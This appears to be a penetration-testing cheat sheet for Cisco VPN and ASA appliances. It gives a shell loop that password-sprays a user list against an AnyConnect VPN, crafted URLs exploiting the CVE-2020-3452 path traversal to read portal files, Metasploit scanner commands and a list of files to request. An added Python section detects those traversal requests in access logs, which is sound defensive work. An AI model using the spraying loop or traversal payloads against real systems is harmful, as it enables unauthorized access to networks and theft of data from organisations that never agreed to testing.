Cisco

Brute Force Authentication

Manually, the quick and dirty way:

$ for user in `cat users.txt`; do echo 'Passw0rd!' | sudo openconnect vpn.contoso.com --user=$user --passwd-on-stdin --servercert=pin-sha256:<BASE64> | tee -a openconnect.log; done

ASA Path Traversal

CVE-2020-3452

Check manually:

https://cisco.example.com/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
https://cisco.example.com/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
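
Defender's view of the two requests above, as an added example (not part of the original page): flag them in web access logs. It assumes a combined-format access log from a reverse proxy or WAF in front of the ASA; the log lines, IPs and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoints and parameters taken from the two check URLs on this page.
ENDPOINTS = ("/+cscot+/translation-table", "/+cscot+/oem-customization")
PARAMS = ("textdomain", "lang", "name", "platform", "resource-type")
# Assumed input: combined-format access log from a proxy in front of the ASA.
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')


def is_traversal_request(target):
    """True when a request target matches the CVE-2020-3452 check pattern."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(ENDPOINTS):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in PARAMS:
        for value in query.get(name, []):
            # parse_qs decoded once (a literal '+' became a space); decode
            # again in case the value was logged double-encoded.
            value = unquote(value).replace(" ", "+").lower()
            if ".." in value or "+cscoe+" in value:
                return True
    return False


def scan(lines):
    """Return (client, target, status) for every matching log line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_traversal_request(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2020:10:01:02 +0000] "GET /+CSCOT+/translation-table?type=mst'
    '&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Aug/2020:10:01:03 +0000] "GET /+CSCOT+/oem-customization?app=AnyConnect'
    '&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/session.js HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Aug/2020:10:02:00 +0000] "GET /+CSCOT+/translation-table'
    '?type=manifest&textdomain=AnyConnect&lang=en-us HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Aug/2020:10:02:01 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 3011',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Hits with status 200 are the ones to triage first, since the appliance returned content for the traversal request.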

Check with MSF:

msf > use auxiliary/scanner/http/cisco_directory_traversal
msf > set RHOSTS file:cisco.txt
msf > run

Files that potentially exist and can be requested to prove the vulnerability:

apcf
app_index.html
appstart.js
appstatus
ask.html
auth.html
blank.html
ced.html
cedf.html
cedhelp.html
cedlogon.html
cedmain.html
cedportal.html
cedsave.html
clear_cache
color_picker.html
color_picker.js
common.js
commonspawn.js
connection_failed_form
cookie
custom
do_url
files
gp-gip.html
help
home
http_auth.html
include
lced.html
localization_inc.lua
logo.gif
logon.html
logon_custom.css
logon_forms.js
logon_redirect.html
logout.html
no_svc.html
noportal.html
nostcaccess.html
ping.html
pluginlib.js
portal.css
portal.html
portal.js
portal_ce.html
portal_custom.css
portal_elements.html
portal_forms.js
portal_img
portal_inc.lua
preview.html
relayjar.html
relaymonjar.html
relaymonocx.html
relayocx.html
sdesktop
sess_update.html
session.js
session_expired
session_password.html
shshim
svc.html
test_chargen
tlbr
tunnel_linux.jnlp
tunnel_mac.jnlp
ucte_forbidden_data
ucte_forbidden_url
user_dialog.html
useralert.html
win.js
wrong_url.html
